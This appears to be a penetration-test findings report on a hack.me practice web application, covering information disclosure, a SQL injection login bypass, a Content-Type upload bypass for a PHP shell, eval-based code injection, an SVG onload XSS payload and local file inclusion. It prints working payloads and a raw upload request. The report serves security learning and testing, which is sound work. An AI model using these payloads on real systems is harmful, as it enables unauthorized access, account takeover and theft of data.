# Web
## Findings
### Information Disclosure (**Low**)
* PHP version 5.3.28  
* Microsoft-IIS/7.5
### SQL Injection (**CRITICAL**)
* No robots.txt
* Login.php breaks when entered a single quote, possible SQL injection vector
```html
<b>Warning</b>:  mysqli_close() expects parameter 1 to be mysqli, null given in <b>C:\inetpub\wwwroot\coliseum\sandboxes\157399-104737\BODY\inner\loginCheck.php</b> on line <b>
```
The error also discloses that the OS is Windows by the path.
* Possible query being executed
`SELECT * FROM users WHERE username='' AND password=''`
* Injecting `admin'--` bypasses the login page.
```sql
SELECT * FROM users WHERE username='admin'--' AND password='admin'--'
```
We are now admin
```md
# **Hello Admin**

# **ypk327ms**
```
* An attacker can bypass the login as admin and possibly dump the database.

### Upload bypass(**HIGH**)
* Upload functionality for a profile photo
* Only accepts jpeg/png
* If upload php:
`Level1  
Sorry, only JPEG & PNG files are allowed.Sorry, your file was not uploaded.`
* Double extension such as jpg.php does not work.
* Tampering the content-type bypasses this check.
```http
POST /fileUpload/upload.php HTTP/1.1
Host: s157399-104737-9sv.sipontum.hack.me
Content-Length: 5797
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://s157399-104737-9sv.sipontum.hack.me
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBbDWcA0ncgxUMlor
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://s157399-104737-9sv.sipontum.hack.me/account.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=2ufhe0irlg91r6ofe58an9agv0
dnt: 1
sec-gpc: 1
Connection: close

------WebKitFormBoundaryBbDWcA0ncgxUMlor
Content-Disposition: form-data; name="fileToUpload"; filename="shell.php"
Content-Type: image/jpeg
```
* We get a warning but the file seems to be uploaded
```html
<b>Warning</b>:  move_uploaded_file(./uploads/shell.php) [<a href='function.move-uploaded-file'>function.move-uploaded-file</a>]: failed to open stream: Permission denied in <b>C:\inetpub\wwwroot\coliseum\sandboxes\157399-104737\BODY\inner\fileupload\upload.php</b> on line <b>31</b>
```
* A successful PHP upload could lead to a reverse shell since the upload location is being leaked in the Warning


### Code Injection
Navigating to the mortgage calculator, it doesn't check if we input numbers it just executes it.
* Trying alert(1) gives an error
`Call to undefined function alert() in **C:\inetpub\wwwroot\coliseum\sandboxes\157399-104737\BODY\inner\mortgage.php(57) : eval()'d code** on line **1**`
* This is PHP, trying phpinfo() works and we're given the configuration of the PHP server with secret keys
* exec,system are blacklisted.
* An attacker code injection to perform what he wants


### XSS (**MEDIUM**)
* Sign up for newsletter functionality reflects the value in another page
* Poor sanitization which only script tags are being blacklisted
* SVG tags are not sanitized.
`<svg/onload=alert('XSS')>` will trigger an XSS.
* Only script tags are blacklisted.
* Attacker could send customers a malicious link with the payload to steal cookies

### Local File Inclusion(**MEDIUM**)
* Change language functionality on the account page
`http://s157399-104737-9sv.sipontum.hack.me/fileInclusion/medium.php?file=french`
* The warning indicates that it's using include() to fetch files which mean it's fetching files from a server.
* Attempt to read index.php was successful.
`HTTP/1.1 200 OK`
200 response and index.php is being loaded.

* Attacker could read system files such as SAM and SYSTEM




